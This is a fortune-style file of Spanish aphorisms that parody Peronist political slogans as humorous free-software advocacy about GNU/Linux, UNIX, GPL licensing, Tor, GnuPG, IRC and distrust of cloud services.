Queremos un software socialmente justo, económicamente libre, y políticamente soberano.
%
Constituimos un kernel monolítico, una paquetería organizada y aplicaciones libres.
%
640K no deben ser suficientes para nadie.
%
Dentro de la Terminal, todo. Fuera de la Terminal, NI JUSTICIA.
%
Y cuando uno de nuestros servidores caiga, caerán cinco de los de ellos.
%
Compilar, base para Ejecutar. Ejecutar, base para Copiar. Y Copiar, base para Compartir.
%
Todo este mundo maravilloso que estamos viviendo -técnico y científico- es consecuencia y se ha gestado con el sacrificio de los Pueblos, especialmente de los trabajadores.
%
El cómputo ha de ser de quien lo trabaja, y no del que vive consumiendo sin producir.
%
El hacker programa para el Movimiento del software libre. Quien sirve a una compañía lo es sólo de nombre.
%
En GNU, compilar es un derecho que crea dignidad humana y es un deber, porque es justo que todos compilen al menos lo que ejecutan.
%
Para nosotros un depurador no es un fin, sino el medio para el bien del kernel y la grandeza y felicidad de sus hackers.
%
Los dos brazos del hacktivismo son el Software Libre y el Hardware Libre. Con ellos damos a los hackers un abrazo de Justicia y Amor.
%
El hacktivismo quiere la unidad de los hackers y no la lucha. Queremos POSIX, pero no formateos.
%
El cómputo no es libre, o lo utiliza el Pueblo Organizado en beneficio propio, o la utilizará el Capital en su desmedro irremediable.
%
Marcharemos con GNU en el Linux, o con Linux en el GNU.
%
Unix nos da la fuerza, POSIX la cohesión.
%
No es que los similares a Unix sean tan buenos. Es que los demás han sido peores.
%
A más bits, menos tiempo.
%
Quien quiera copiar, que copie, y quien quiera compilar, que compile.
%
En computación jamás hay que piratear a nadie. Hay que decompilar todo lo que se pueda.
%
Que sepan hoy los indignos farsantes que este pueblo no piratea a quien no lo traiciona.
%
El Software Libre no es un programa, es una Doctrina.
%
El Software Libre es Justicia Social 2.0.
%
El software libre es la finalidad maquinada en el alma colectiva de la comunidad organizada. Su arquitectura define sus formas de ejecución.
%
Administrar Unix es fácil. Lo difícil es Conducir una Comunidad.
%
El Software Libre necesita apóstoles y para ser apóstol hay que estar dispuesto a ser héroe, y solamente los fanáticos de amor por una causa son capaces de morir por un ideal.
%
Dividimos la industria del software en dos categorías: una, la de los hombres que programan, y la otra, la que vive de los hombres que programan. Ante esta situación, nos hemos colocado abiertamente del lado de los que programan.
%
Llevo en mis oídos la más maravillosa música: aquella sintetizada con software libre.
%
Yo he visto BSDeros que se han vuelto Linuxeros, pero no he visto jamás un Windowsero volverse inteligente.
%
Sin Software Libre no hay posibilidad de Justicia Social 2.0.
%
En nuestro tiempo, programar es crear Software Libre.
%
El Software Libre vence al Tiempo.
%
Cuando el disco rígido mecánico agota su vida útil, suele tronar como escarmiento.
%
Copiar no es como muchos creen, piratear, copiar es distinto que piratear, Piratear es ajusticiar, copiar es compartir, y al software siempre es mejor compartirlo que piratearlo.
%
Esto se programa, se compila, se ejecuta, y recién después se copia. Es decir, el software depende de esa acción, de una preparación, y de una organización.
%
El software a nadie le sale al paso, no es obra de la casualidad, el software es obra de la previsión, de la organización y la realización libre.
%
No hay peor cosa que un Windowsero con inquietudes.
%
El consumo del software sube en ascensor, la potencia del hardware por escalera.
%
¡Programadores! Únanse. Sobre la unidad de los que programan, ha de levantarse en este hermoso server la unión de todas las aplicaciones.
%
Tengo tres honras en mi vida: la de ser un soldado, la de ser un patriota y la de ser el primer programador argentino.
%
Que sea esta unidad indestructible e infinita, para que nuestro pueblo no solamente posea su almacenamiento, sino que también sepa dignamente defenderlo.
%
Se vence con inteligencia y organización. Por ello les pido también que conserven una calma absoluta y cumplir con lo que es nuestro lema de siempre: de /home a /var y de var/ a /home.
%
Todo sistema informático debería ser infalible, pero no es un arte de los Dioses sino una creación humana, y como tal posee sus mismos bugs y las mismas inclemencias que afectan a toda máquina engendrada en la mente terrenal.
%
El software libre ha de estar en capacidad de ayudarnos en cualquier situación que se cuadre, incluyendo probables situaciones de emergencia.
%
Mal está llorar sobre la leche derramada, si el Software Libre puede otorgarnos otra vaca, y gratis.
%
No podemos estar aislados. En los tiempos que corren, hemos de subirnos a tren de las comunicaciones informatizadas y saludar a todo el mundo.
%
Cualquiera puede hacer uso de su informática sin costo monetario, y permitiéndonos multiplicar su efectos positivos en todo tiempo y lugar.
%
Hemos de formar ágiles bandas telemáticas, encargadas de hacer tronar el escarmiento y propiciar la independencia real de la Nación, su Pueblo y su software.
%
Nuestro enorme campo de acción son las redes, pretendidas por el enemigo pero dominadas por nuestro Pueblo.
%
Encomio lo compilado.
%
El software privativo, que ha sido hasta ahora una forma disimulada de la tecno-esclavitud, será suprimido. Eso se acabó.
%
Aquel que no pueda pagar los metadatos, deberá vender su centro de datos.
%
La máquina, el servidor, el centro de datos y cualquier establecimiento que se encuentre fuera de las leyes del trabajo, no pueden gozar de ninguno de los beneficios que concede el Estado. Hay que tratados como enemigos sociales.
%
La infraestructura de correo electrónico que se utiliza en todo el mundo es, por diseño, insegura.
%
La mayoría de los servidores de correo públicos no están controlados por los destinatarios, sino que son ofrecidos por proveedores de Internet de la oligarquía.
%
Debemos desconfiar de los servidores de correo ofrecidos por la oligarquía. Han demostrado no tener escrúpulo alguno y acceder a correspondencia electrónica de aquellos abonados a quienes consideran riesgosos para sus planes inconfesables.
%
La oligarquía ha hecho - a falta de ley adecuada de protección - abusos informáticos duraderos.
%
Para contrarrestar la insidiosa acción oligárquica sobre la telemática contamos con dos soluciones libres interdependientes: la firma digital de los mensajes de correo electrónico, y su cifrado por medio del criptosistema GnuPG.
%
No todos podremos programar un núcleo de sistema operativo, pero si todos podemos instruir a un Compañero en la senda para la liberación que significa emplear un software liberado bajo licencia GPLv3.
%
No existen excusas para quien -sabiendo emplear programas libres-, no pueda transmitir ese conocimiento a quien lo necesita.
%
Como siempre sucede durante las actualizaciones de versión de sistema, debemos proceder a realizar un respaldo de nuestros datos, por las dudas que algo salga mal.
%
Prevenir es siempre mejor que curar, y una actualización de sistema siempre es excusa adecuada para actualizar nuestras copias de respaldo.
%
Si bien al actualizar el sistema todo debería marchar adecuadamente, a seguro se lo llevaron preso.
%
Si bien el quehacer y potencia de nuestra Doctrina están consolidadas en los servidores y en los entornos de alta complejidad, es Ubuntu el sistema que permite integrar con más amor al sector del usuario descamisado.
%
Hemos desarrollado los sistemas multiusuario para la aplicación científica, pero más que nada para dar una respuesta a la injerencia y a la injusticia que significaban los sistemas operativos privativos.
%
Contra el Capital y contra el software privativo la lucha jamás ha de darse por vencida. Cuántos han sido los cocodrilos bien intencionados que han ido a roncar sólo para despertar envolviendo unos mangos...
%
Nuestro Movimiento, anclado en una vertiente de Justicia Social en el software, ha desarrollado una red tan oscura como la piel de nuestros grasitas. Se trata del proyecto Tor.
%
Un problema básico para el anonimato y privacidad digital radica en lo obvio: que el enemigo intercepte el tráfico telemático.
%
Han de considerar el correo electrónico como lo que es: una carta abierta. Si desean privar de su lectura a los contreras, habrán de encriptarlo con GPG.
%
La mal llamada "nube" es en realidad una computadora ajena.
%
Si alguien dice que su computadora puesta en línea es una "nube", está engañando con insidia a incautos. No ha de almacenarse allí información alguna.
%
Si por absoluta necesidad debes almacenar información en una computadora ajena que publicitan como "nube", asegúrate de encriptar dichos datos muy severamente.
%
Yo no persuadía a la gente con kernels, porque un kernel poco persuade. Yo persuadí a la gente con compiladores y con el cubo 3D de Compiz.
%
¿Y cómo construyo un kernel? Pedí usar el compilador GCC... no lo conocía ni el gato. Y ahi empecé a compilar piezas de código. Y una cosa lleva a la otra, y todas a la felicidad de los hackers...
%
El compilador GCC es el kilómetro cero de GNU.
%
GCC, la unidad de los compiladores, y al que no le gusta, se jode, se jode.
%
Hubo uno que hasta tuvo que hacer milagros para que lo siguieran doce. Compilando este Kernel ya me siguen millones.
%
Un hacker usa la CPU función del Pueblo.
%
De la calidad del kernel depende la calidad de las aplicaciones.
%
Al operar GNU correrá programas libres; que se compilan, modifican, y aunque no quieran tener bugs, los tienen.
%
El software de GNU es un fin en sí mismo, no sólo medio. Son programas de computadora cuyos usuarios han de tener las cuatro libertades y no otras; programas que buscan la felicidad de la Comunidad Organizada.
%
Yo divido la acción de GNU en dos vertientes: la acción administrativa (para la cual tiene un pequeño conjunto de aplicaciones en /usr/sbin), y la acción de lucha, que sucede en /usr/bin.
%
UNIX existía antes que GNU, pero fue GNU quien les dio el lugar que los hackers merecían por justo derecho.
%
En esta red de datos, lo mejor que tenemos es GNU.
%
Me hacen gracia los que se dicen hackers usando Window$. No hay hackers fuertes en un sistema operativo débil.
%
La gran discusión en la que se sumirá el mundo no radica en compilar el software, sino quién conduce la compilación del software. Yo digo que la compilación la tiene que realizar el Pueblo.
%
El hacktivismo presupone la existencia de la CPU, del ser humano y de una Comunidad Organizada mancomunadamente en pos de su Libertad.
%
Una manera muy simple de análisis de tráfico telemático puede realizarse en cualquier lugar intermedio, e incluso en estos casos simples, poner en peligro a nuestra Masa de Acción y sus organizaciones.
%
Incluso si encriptamos la carga útil en nuestras comunicaciones, un análisis superficial del encabezado del paquete puede aún revelar gran parte de nuestras actividades y accionar.
%
Cualquier intermediario en las redes podría adaptarse a nuestros patrones de tráfico telemático, y trazar conclusiones relativamente acertadas sobre su contenido, las tácticas empleadas, etc.
%
Un actor dedicado puede escrutar la red empleando cruzados estadísticos sofisticados para rastrear patrones de comunicación de individuos u organizaciones específicas.
%
Quien programe, comente. Quien use, documente.
%
Adoctrinar sobre el software libre es tan útil como usar # para agregar comentarios al código fuente.
%
Tor, a través de sus servidores, ayuda a reducir los riesgos telemáticos inherentes a través del ofuscado y redistribución de las transacciones a lo largo de múltiples secciones en la Internet.
%
WAIS, Altavista y Webcrawler marcaron la senda que irrevocablemente seguirá Googl€. No existe manera de evitar el destino de quien -abusando de la centralización- osa desafiar a los Pueblos.
%
Bajo la oscura capa de Tor se dificultará rastrear un par de enlace desde su origen y hacia su destino específico, de la misma forma que una liebre podría seguir una ruta rebuscada para perder al mastín.
%
Que todo FTP tenga su ARCHIE.
%
Antes que Googl€ estuvo Verónica.
%
Antes que UNIX estuvo TENEX.
%
Antes que TENEX estuvo MULTICS.
%
Antes que MULTICS, estuvo CTSS.
%
Antes que CTSS, la nada.
%
Muchachos, ya saben para que es la cosa: si van a meterse con Window$, pónganse dos antivirus. Uno arriba del otro.
%
El Movimiento ha desarrollado Mastodon, un software libre pensado para establecer servidores autogestionados de contenidos para microblogging federado. Es posible contar así con todas las ventajas del blogueo a nivel microscópico, pero en un fediverso regido por nuestras propias y convenientes reglas.
%
"Commodore 64, el cómputo para las Masas".
%
Las BBS desaparecieron cuando quisieron cobrar. Cobraron.
%
Si usted quiere armar una BBS paga, yo organizo una fuerza suficiente, voy, y lo mato.
%
Debemos imponer distintos protocolos acordados para el envío y la recepción de paquetes informáticos, dependiendo de su urgencia, velocidad y volúmenes de bits a transportar. Esta es la manera en la que se puede organizar - desde un punto de vista racional y técnico - el manejo paquetizado de la información.
%
El FTP es un protocolo simple y popular, y si bien es posible utilizar unas medidas de seguridad limitadas con él (en forma de sesiones únicas con usuario y contraseña, directorios protegidos), actualmente se lo considera un modo de comunicación básico, recomendado sólo para ficheros y material que podamos considerar público.
%
Al operar desde la superficie nos podemos mantener al tanto gracias al IRC o Internet Relay Chat, herramental imprescindible para entablar comunicaciones 
telemáticas en tiempo real.
%
Las salas de chat IRC pueden diagramarse dentro de un servidor de la forma que queramos a fin de lograr cierta privacidad, mediante el uso de "canales" (las cuales también podríamos llamar "sub-salas").
%
Los usuarios de IRC normalmente pueden seguir el temperamento de crear sus propias sub-salas temáticas, las que suelen indicarse con el símbolo "#". Estas permiten orientar las charlas si fuese necesario.
%
Existen ricas subculturas basadas en el uso de programas de conversación telemática.
%
Si bien es cierto que el IRC puede constituir una forma de interacción aterrorizantemente cerebral y mecánicamente deshumanizada, pero normalmente es todo lo contrario.
%
IRC fue inventado para divertirse con las comunicaciones, y este continúa siendo su uso más popular.
%
Fue el año 1988 cuando se compiló el primer programa de IRC, para permitir la comunicación escrita síncona entre múltiples usuarios mediados por la Internet.
%
Los adeptos al IRC pueden fácilmente volverse adictos.
%
IRC es - en escencia - un flujo de datos.
%
IRC es una forma de comunicación dinámica: nuevos mensajes aparecerán en la pantalla, y reemplazarán a los viejos.
%
IRC cuenta con los elementos mínimos de comunicación necesarios para que un grupo de compañeros cree un sentido compartido de comunidad.
%
En IRC, el discurso es efímero.
%
Los compañeros suelen dejar una pequeña "ventana abierta"; en ella se proyecta el texto de una sala de conversación IRC.
%
Si aparece un mensaje en la ventana de conversación, significa que alguien - en algún lugar del mundo - la escribió no mucho más que un segundo atrás.
%
Cuando chateas no puedes ver a la gente, pero puedes inferirla.
%
Sin expresiones faciales, tono de voz, lenguaje corporal, ambiente físico compartido y otras pistas contextuales, las emociones pueden transmitirse a través del chat IRC usando emoticones.
%
El programa WRITE permite a los compañeros hospedados en máquinas UNIX distintas comunicarse pantalla a pantalla.
%
Los sistemas de chat que permiten a un individuo enviar mensajes mecanografiados directamente al terminal de otra persona enlazada a la misma máquina se remontan a los sistemas de tiempo de cómputo compartido de la década de 1960.
%
Gran parte del software que recibo y envío está preparado en lenguaje Python, el nuevo BASIC capaz de correr en todo tipo de máquinas.
%
Para conducir a Python, que mejor que un gestor de paquetes de facto: el pip.
%
Un verdadero hacker ha de poseer la habilidad para dividir su accionamiento informático en partes pequeñas comprensibles, que le avalen la realización de muchos trabajos sencillos. El total de sus realizaciones será la suma y unión de las partes. Esta es la manera en la que UNIX nos permite proyectar un futuro provechoso.
%
Módem que no chilla, no conecta.
%
A módem rápido, ruido de línea.
%
Sobre gustos no hay nada escrito. Yo prefiero los Pall Mall o los Particulares picado grueso cortado a cuchillo, pero también puedo optar por el charuto. En intérpretes de comandos, uso el Bourne Again Shell, el mítico Bash.
%
Power$hell es inútil: no deja de ser una ajada bandera que Micro$oft pretende imponer como reemplazo del poderoso Bash que todos hemos aprendido a dominar.
%
Un usuario bisoño chocará con la necesidad de dominar fluidas relaciones de fuerzas entre aquellos programas privativos y los libres.
%
Por principio nodal, lo natural tiende representar un equilibrio de fuerzas, y la acción mas difícil es la que nos requiere destruir tal equilibrio. Pero dejen que alguien tenga que pagar un paquete de software y verán como se inicia el desequilibrio automáticamente: la víscera más sensible es el bolsillo.
%
Yo no soy partidario de empezar a programar en grande para, muchas veces, terminar en un programa mórbido; vale más seguir la senda de la programación de las pequeñas cosas que, con el tiempo, se hacen grandes, se consolidan y se hacen fuertes.
%
A un pato se lo caza con llamador; unos graznidos realizados con este instrumento cerca de una laguna harán curosear a una de estas aves y ahí hay que atizarla. Instalar software libre también hace lo procedente, y con uno que hable usted capturará dos o tres zonzos.
%
Para cazar perdiz no debemos recurrir a disparar al cielo con la escopeta esperando que la casualidad nos ayude a pegarle a algo; la técnica eficaz consiste en utilizar un perro avispado que busque en el pajonal y nos levanta la perdiz. Un LiveCD con Linux puede hacer lo mismo.
%
La suma de todos los beneficios sociales benefician a todos. La enseñanza de un sistema UNIX tiene también las mismas implicancias.
%
Mas que de la piratería, yo soy partidario de la libre copia.
%
Es sabido que un programador ha de contar con las mejores herramientas para hacer su trabajo. Pero muchas veces las mejores herramientas son las que el mismo programador compila y amolda a sus necesidades.
%
Mi rol como Conductor del Movimiento me impone acercar de forma paternalista las soluciones anheladas por las Masas del Pueblo. Por lo tanto volcaré esta sapiencia para que cada uno lleve en su mochila el bastón de Mariscal.
%
Al desarrollar software libre, podemos hacerlo en cualquier punto de su escala de aplicación. Para ello nuestro software ha de poder correr en macrocontroladores, pero también en microcontroladores. Debemos conocer el lenguaje ensamblador, al que dominaremos rápidamente.
%
En esto la programación en C es como la naturaleza: es nuclear. Como es nuclear el microcosmos, también es nuclear el macrocosmos. Y como este software es capaz de correr en microcontroladores, también habrá de correr en mainframes.
%
Debemos romper la tranquera del software privativo y si es necesario, cortar la cadena y la mano de las oligarquías locales y cipayas.
%
Nuestros programadores lo han comprendido, y ustedes ya saben qué distro tienen que instalar.
%
Me he hecho eco de aquella vieja demanda y anhelo, en la cual todos me piden que les otorgue las herramientas más poderosas para su quehacer diario. ¡La oligarquía nunca lo hizo! Sin embargo, nuestra Doctrina avala que cada uno disponga de un potente UNIX.
%
Programar es un arte, y como tal tiene su técnica y tiene su teoría. Conociéndolas estas es mucho más fácil programar que ignorándolas.
%
Quien se dedica a la programación debe ser profundamente humanista. El programador siempre trabaja para los demás, jamás para él.
%
Nuestros adversarios tienen menos calle que Venecia. Nuestro deber fundamental es hacer pesar la valía de la libertad de modificación del software, que nunca se presenta asfaltada, y extender nuestro sistema de comando y control a través de valores que son nuestros.
%
Decir que la CPU es un microprocesador es lo mismo que decir que la CGT es un hombre.
%
La CPU no es un chip. La CPU es un órgano.
%
El Kernel constituye el órgano de la conducción táctica. El órgano de la conducción estratégica es el Hacker.
%
Cuando HP hizo HP/UX y la IBM sacó AIX, supimos que la guerra UNIX estaba decidida. Porque si estos señores le quieren colgar un UNIX al mainframe, es porque no tienen ni calzón que ponerse pa' ir al baile.
%
En estos tiempos, pagar una licencia de software es un crímen.
%
Puntero mata web UI y justicialismo mata bigdata.
%
Un programador oficia como orquestador y Maestro Director, ofreciendo a su olfato técnico lo mismo que un director de orquesta hace a su oído. Orienta así su código en una pieza coherentemente concebida, en la que la sumatoria de las subrutinas ejecutan una idea-fuerza común que la CPU llevará a cabo.
%
Los avances tecnológicos han sido fundamentales para realizar la evolución de los hombres. Lo han sido el fuego, la rueda, la vela, el sextante, hasta terminar en el transistor y las redes conmutadas de datos.
%
Si no hacemos lo necesario como individuos conscientes en una Comunidad Organizada de la era de la Información, otros intentarán hacerlo por nosotros para desinformarnos.
%
Nuestro Pueblo tiene la necesidad imperiosa de apropiar las tecnologías de la información y darles nuevo uso como un duro ariete contra la Oligarquía y las sinarquías que lo han dominado.
%
Cualquiera puede hoy producir contenidos audiovisuales y hacer streaming, con tal de difundir el software libre a las Masas. Clickbaiteando y viralizando podremos extender al Justicialismo a una nueva dimensión.
%
A nuestro Movimiento no le venden globos. Nos ha caracterizado una sana raigambre planfetaria que aclara a cada quien lo que tiene que hacer bajo el lema "todos unidos triunfaremos". Si alguno cree aún en vacuas promesas aéreas, les pinchamos el látex de una.
%
La responsabilidad que le cabe a los hackers no es otra que la que están llevando a la realidad en base a su esfuerzo: formarse y organizarse. Formarse para promover el progreso del kernel, y organizarse para defender el sistema compartido y lanzarse hacia el futuro bajo el signo del Software Libre.
%
UNIX es el bombo. Sus hackers, la manguera.
%
¿En qué consiste y qué es cada una de las partes del método de la programación? Primeramente especificar la situación, segundo, la apreciación de esa situación; y tercero, la resolución que surge de esa apreciación de la situación que hemos contemplado. Vale decir, que de la situación y de la apreciación (o sea del fenómeno y del análisis) fluye el código fuente.
%
La informática nos permite distribuir de forma electrónica todo tipo de documentos, incluyendo libros, y torrentearlos en meros segundos.
%
La gran compresibilidad de los datos textuales al tornarlos en formato digital vuelven aquella concepción "sin papel" en una Realidad Efectiva.
%
Desde el punto de vista biológico natural, estamos sometidos a los términos de una Evolución - en la cual la naturaleza obra para mejorar al más apto para lograr su trascendencia a través del tiempo. En el caso de nuestro kernel, obramos creativamente para hacerlo trascender en el tiempo bajo la ondeante bandera de la Libertad.
%
La Masa programa en Python. El Conductor en ensamblador.
%
Huayra es un sistema operativo libre concebido para el plan de informatización educativa Conectar Igualdad. Fue desarrollado en Argentina por el Centro Nacional de Investigación y Desarrollo de Tecnologías Libres (CENITAL), siguiendo los principios y libertades del software libre. Puede ser utilizado, estudiado, modificado y redistribuido.
%
La libertad de modificación no es una limosna, es un Derecho que la comunidad se gana estudiando el código.
%
Tengo en mi escritorio todo lo necesario para la conducción del sistema. Esto es así gracias a la licencia GNU que nos ha proporcionado un norte cardinal para nuestras acciones, y al Software Libre que lo ha sustentado.
%
Quien quiera aceleración 3D, que programe; quien quiera bluetooth, que compile.
%
Los programas libres pueden mancomunarse junto a otros libres, y atresar una unidad indisoluble e infinita.
%
La libertad se defiende en el campo, en el taller, en la calle, en casa y en la CPU. No se puede aceptar que uno sea libre en su casa mientras que en el taller, en la fábrica, en la calle, y en la CPU su software es esclavo.
%
Deben seguir adelante con su organización y defender su software libre. La libertad individual es la base de la libertad colectiva, y esta construye el cimiento de la libertad del software.
%
El software privativo es un efecto de la injusticia social.
%
Contra sofismas y dictaduras de quienes paradójicamente se proclaman liberales y propugnan el software privativo, decimos la verdad.
%
El usuario novato poco puede hacer por el bien del sistema más que disfrutarlo. Es el admin quien debe contar con gran expertise, y su tarea fundamental es la de entender el manejo del sistema y administrarlo para el bien del Pueblo.
%
En los sistemas tipo UNIX podemos contar con una estructura de directorios, y los mismos pueden contener archivos. Estos normalmente son visibles y evidentes para los trabajadores.
%
Entubar el uso de herramientas disímiles es lo que torna a un sistema UNIX poderoso. Esto es lo adecuado y también lo justo.
%
No utilizo software privativo alguno. ¡Prefiero morir de hambre antes que comer el amargo pan de la traición!
%
¡Vengo conmovido por el eco resonante de una sola voluntad colectiva; la de que todo el software tenga GPLv3, para que de una vez por todas quede libre de la esclavizante EULA que lo agobia!
%
Hemos venido a terminar con una moral social que permitía que los programadores tuviesen para compilar sólo lo que se les diera por voluntad patronal y no por deber impuesto por la Licencia GNU.
%
¡Que haya una sola clase de Software: el Libre!
%
Ojo con Window$: a un tonto solo hay que ponerle cerca una cuerda y se la atará al cogote nomás para ver cómo le aprieta.
%
Después del apt-get install vendrán los paquetes que bueno me harán.
%
Ahora aparecen las fuerzas centrípetas en la política: aquellas que impulsan a las masas hacia nuestro centro de atracción, conformándolo toda vez de manera más densa y acelerada. Estamos en el engorde de un Movimiento que - en la medida que compilemos más paquetes - se hará más y más fuerte.
%
Ante la parafernalia montada y la mentira, hemos de contestar golpe por golpe, en todo tiempo y en todo lugar. Nuestra batalla es contra una oligarquía ensoberbecida, dispuesta a vender el software al mejor postor, y capaz de hacerlo por sus ínfulas foráneas.
%
Si deseamos pelearnos entre nosotros, más vale que sea en un FPS corriendo en un servidor local. Los de afuera son de palo.
%
Si no quedan más medios, tal vez debemos imponer la acción violenta, mas este ha de ser el último de los recursos que debemos imponer. Mientras tanto debemos decompilar todo lo que se pueda.
%
MULTICS no archiva. Segmenta.
%
Los medios de almacenamiento de un sistema informático equivalen lo que la vestimenta en un ser humano. No podemos pretender que ésta represente siempre la última moda; cada tanto hemos de cambiarlos.
%
La sabiduría es un valor intangible, pero acotado si no puede transmitirse. Es por ello que a lo largo de la historia, esto fue tarea primero de los didactas en la antigüedad griega, y luego de los escribas del medioevo, para finalmente recaer en los renacentistas de la imprenta en dicho período. En la Era de la Información - que es por la que transitamos - esto ya es una tarea de todos.
%
Nuestra Cultura es permeable a los cambios, y desde el Martín Fierro hasta el libro más risueño, hemos de leerlo y compartirlo por Torrent.
%
De un tiempo a esta parte, se han popularizado los e-Book -libros electrónicos-, que no operan ya de forma física sino que son documentos informatizados. Estos cuentan con la ventaja de su fácil transmisión telemática, y su bajo costo.
%
Pocos sistemas se pueden hacer aislados: normalmente los UNIX son un kernel y cien mil aplicaciones.
%
Hay una sola forma de resolver el problema de la agitación de las masas, y ella es el verdadero software libre.
%
No queremos consentir que en la gran ciudad telemática que habitamos, los datos del programador experto, profesionalmente calificado, residan hacinados en un servidor ajeno inmundo porque su patrón se niega a instalar una instancia libre de almacenamiento.
%
Nos quieren decir que lo nuevo es contar con aplicaciones de ejecución remota, en la nube. Esta doctrina que se denomina "software como servicio" no es otra cosa que la zoncera de siempre, una engañifa para incautos.
%
El problema de llamar a GNU Linux no es un problema de todos. Es un problema entre Richard Stallman y Linus Torvalds. Que se arreglen entre ellos. Nosotros nos entendemos clarito.
%
Estos señores que propugnan el uso de la "nube" sólo tratan de convertirnos en meros inquilinos del software en equipo ajeno, con la intención inconfesable que paguemos el alquiler con nuestros datos y las expensas con nuestra propia dignidad.
%
¡Hackers! Todos han sufrido las consecuencias de quienes se presentan como amigos pero son mercaderes de nuestra privacidad y nuestro Capital, que es el trabajo.
%
La Columna Vertebral de nuestro Movimiento la conforman los hombres que programan. Ellos tienen la tarea de muscular y atresar nuestras organizaciones a fin de resistir cualquier embate que nos planteen.
%
La memoria de masa no vale por su número, sino por la calidad de sus medios de almacenamiento.
%
Existen ocasiones donde lo importante es la interfaz y la velocidad. La interfaz, porque debemos replicar un flujo de trabajo existente en otras aplicaciones y no tenemos tiempo o ganas de seguir un trabajo nuevo. Y la velocidad, porque anhelamos una aplicación moderna que dé lo máximo del hardware que tenemos.
%
El hardware podría considerarse importante, pero debemos darle la dimensión que realmente tiene: las de ser maleable herramienta para un trabajo de conjunto tendiente a la Liberación de los hombres, que ha de ser superior.
%
Nuestro Movimiento ha de orientarse a las soluciones sencillas para el hombre de a pie, pues es éste quien -con su corazón y mente puestos en el progreso- trabaja todos los días en pos de la Libertad.
%
La solución musical original prevista en la computadora PC de IBM era mas bien poco imaginativa, ya que los oligarcas del Gigante Azul sólo le habían previsto un mediocre altavoz interno adosado a un oscilador de onda cuadrada. A eso, esos miserables lo llamaban "el sonido del pueblo".
%
Desde las unidades de IBM que acompañaban a las mainframe (de un tamaño individual que superaba a una heladera Siam), hasta el simpático Datasette del microordenador Commodore 64, la cinta ha sido protagonista del almacenamiento de Masa.
%
Para nosotros programar es adoctrinar, porque la doctrina es el único caudillo que resiste a la acción destructora del tiempo, y nosotros trabajamos para el porvenir.
%
Nuestro sistema es uno en donde hacer las acciones anheladas por los trabajadores es de lo más sencillo. A ello he abocado todos mis esfuerzos de creador, artista y Conductor.
%
Algunos programadores pueden optar favorecer ciertas mejoras, toda vez que respetan la estética, credos y demás preconceptos de el código heredado. En tal caso, nos encontraremos frente a un mero efectismo, que no suele suplir las necesidades nuevas con las características de ayer.
%
De todo hay en la Viña del Xeñor... está BSD, está Linux. Algunos dicen que si Balbín se hubiese llamado Balbón y yo me hubiese llamado Perín, distinta habría sido la cosa...
%
Nuestra programación ha de responder a las claves del sistema en que nos movemos, y ella no es infinita en el tiempo, sino que sufre invariablemente de excrecencias y modificaciones.
%
En nuestro tiempo compilar, es adoctrinar.
%
No hace falta una distribución perfecta; se necesita una práctica.
%
Cualquier programa dejado a la oligarquía crecerá hasta ocupar toda la memoria disponible.
%
A Window$ siempre es mejor borrarlo que emparcharlo.
%
Quien usa software privativo piensa que tiene algo y no tiene nada.
%
Nunca le ha servido a nadie el software de otro.
%
Los EULA son como los dioses del Antiguo Testamento, repletos de reglas y faltos de piedad.
%
En computación no hay que emular experiencias. La experiencia es invalorable, pero también se encuentra situada en tiempo y espacio, y este es intransferible. Este insoslayable implicó aquél viejo apotegma que dice que la experiencia es un peine que la vida nos dá cuando nos quedamos pelados.
%
Emular es meter la mula.
%
El emulador le mete la mula al software.
%
Debemos nutrirnos del software pasado de los Compañeros que la vivieron para - en su reflejo - modificarlo y compilarlo para el futuro.
%
Las circunstancias de UNIX no siempre responden a los mismos designios en el tiempo, y es por ello que un programador ha de saber adaptar lo nuevo si es que quiere replicar lo viejo.
%
Un Verdadero Programador ha de saber responder a las auténticas necesidades de su Pueblo.
%
Todo usuario ha de saber darse las herramientas para UNIX por medio de la copia pero también por medio de la compilación.
%
Ya hemos escrito el Kernel, y en condiciones mucho mas adversas, por lo cual las nuevas aplicaciones no revistarán problema alguno.
%
Ahora todo estriba en avivar la llama de la resistencia aumentando el uso de GNU, mientras nos organizamos y planeamos la destrucción de la infraestructura de datos y la denegación de los servicios privativos del enemigo.
%
Todo ello puede ser logrado si nos ponemos seriamente a hacerle la guerra sin cuartel, si trabajamos para tomar contacto con los que programan y los ayudamos desde aquí con todo lo que podemos, especialmente ofreciéndoles potencia de cómputo y almacenaje en nuestros servidores.
%
Muchas cosas de las que haga Googl€ nos favorecerán, otras nos perjudicarán, y la mayor parte no serán ni favorables ni desfavorables pero en adelante sólo debemos confiar en lo que nosotros mismos seamos capaces de compilar para destruirlo.
%
Volver al BASIC nos recuerda las condiciones de antaño, y las posibilidades que teníamos entonces, mucho más acotadas sin duda gracias al avance de una técnica que hemos dominado.
%
El código fuente se introducía directamente en la máquina, y el esfuerzo requerido por ello hacía imprescindible la participación del Pueblo en la libre modificación del código, su libre copia - y sobre todo - la excelencia de distribuirlo libremente entre los compañeros.
%
Ya no podemos darnos el lujo de admitir redes de datos formalmente inertes, pero que en la práctica forman el modelo de expresión monopólico y oligárquico por antonomasia.
%
Las redes sociales basadas en empresas y sus viejos dirigentes, carecen ya del margen de maniobra necesario para nacer o reconstituirse en un medio de comunicación democrático.
%
Frente al aniquilamiento de la neutralidad en la red, parecería no quedarle a nuestro Pueblo más opción que esperar una implosión sistémica que permita barajar y dar de nuevo.
%
Detener las actualizaciones equivale a lo que nuestros baqueanos denominaban "desensillar hasta que aclare".
%
La historia no es frondosa en ejemplos de caída de sistemas GNU, y en el particular de los BSD, estos están pre-programados - diremos - para operar precisamente en ese fino equilibrio previo a la caída. 
%
Es difícil hacer caer a GNU. Sólo una impúdica conducción hará que esta bicicleta - a cuyo manubrio tironean la RAM por un lado y el disco por otro - dé por el suelo.
%
La potencia de cómputo avanzada sólo se desplegará con el multihilo simultáneo, el cual oficiará de nivelador capaz de sustentar un pedaleo de acción pendular entre los núcleos que componen su CPU.
%
Los sistemas operativos BSD no son clones, sino derivados de código abierto del UNIX de Investigación de AT&T, a su vez ancestro del UNIX System V.
%
AT&T UNIX no es código abierto y, en sentido estricto del Derecho de autor, BSD no es UNIX en absoluto.
%
No faltarán los que prefieran obtener licencias de uso de UNIX en lugar de desarrollar sistemas operativos por sí mismos.
%
Ninguna persona o empresa es dueña de BSD. Es creado y distribuido por una comunidad de colaboradores altamente cualificados y comprometidos a lo largo y ancho del mundo.
%
Un kernel no puede ser programado por imberbes y estúpidos. Para eso se necesitan hackers.
%
Para ser realmente útil, un software no debe ser un bien privado, sino de constituirse en un medio de carácter social.
%
